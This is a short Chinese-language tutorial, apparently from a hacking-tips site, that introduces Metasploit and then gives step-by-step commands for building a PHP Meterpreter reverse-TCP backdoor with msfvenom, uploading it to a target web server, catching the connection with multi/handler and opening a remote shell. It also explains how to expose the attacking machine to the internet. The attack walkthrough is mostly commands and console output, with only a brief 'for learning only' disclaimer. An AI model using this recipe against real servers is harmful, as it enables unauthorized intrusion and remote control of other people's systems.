Metasploit簡介
灰帽黑客(第3版) Metasploit是一個免費的、可下載的框架,通過它可以很容易地獲取、開發(fā)并對計算機軟件漏洞實施攻擊。它本身附帶數(shù)百個已知軟件漏洞的專業(yè)級漏洞攻擊工具。當(dāng)H.D. Moore在2003年發(fā)布Metasploit時,計算機安全狀況也被永久性地改變了。仿佛一夜之間,任何人都可以成為黑客,每個人都可以使用攻擊工具來攻擊那些未打過補丁或者剛剛打過補丁的漏洞。軟件廠商再也不能推遲發(fā)布針對已公布漏洞的補丁了,這是因為Metasploit團隊一直都在努力開發(fā)各種攻擊工具,并將它們貢獻給所有Metasploit用戶
metasploit框架PHP反向后門建立
- msfvenom -l 查看所有payload
- Framework Payloads (436 total)
- ==============================
- Name Description
- ---- -----------
- aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
- aix/ppc/shell_find_port Spawn a shell on an established connection
- aix/ppc/shell_interact Simply execve /bin/sh (for inetd programs)
- aix/ppc/shell_reverse_tcp Connect back to attacker and spawn a command shell
其他的省略。
這里要使用的是PHP反向后門
- msfvenom -p php/meterpreter/reverse_tcp --payload-options 查看參數(shù)
- Options for payload/php/meterpreter/reverse_tcp:
- Name: PHP Meterpreter, PHP Reverse TCP Stager
- Module: payload/php/meterpreter/reverse_tcp
- Platform: PHP
- Arch: php
- Needs Admin: No
- Total size: 936
- Rank: Normal
- Provided by:
- egypt <egypt@metasploit.com>
- Basic options:
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- LHOST yes The listen address
- LPORT 4444 yes The listen port
- Description:
- Run a meterpreter server in PHP. Reverse PHP connect back stager
- with checks for disabled functions
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.2 LPORT=1234 -f raw >c.php 生成腳本
生成后要將腳本最前面的注釋符去掉,然后上傳到目標(biāo)服務(wù)器上
啟動msf
use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.2
set LPORT 1234
exploit 啟動監(jiān)聽
然后從瀏覽器中打開上傳的腳本http://xxx.com/c.php
msf中就會看到
- *] Starting the payload handler...
- [*] Sending stage (33068 bytes) to XXX.XXX.XXX.XXX
- [*] Meterpreter session 1 opened (192.168.1.2:1234 -> xxx.xxx.xxx.xxx:42280) at
- meterpreter >
如果kali安裝在虛擬機上,需要橋接,然后路由器上將kali DMZ到外網(wǎng)
注意:此教程只用于學(xué)習(xí)使用其它一切后果與本站無關(guān)。
新聞熱點
疑難解答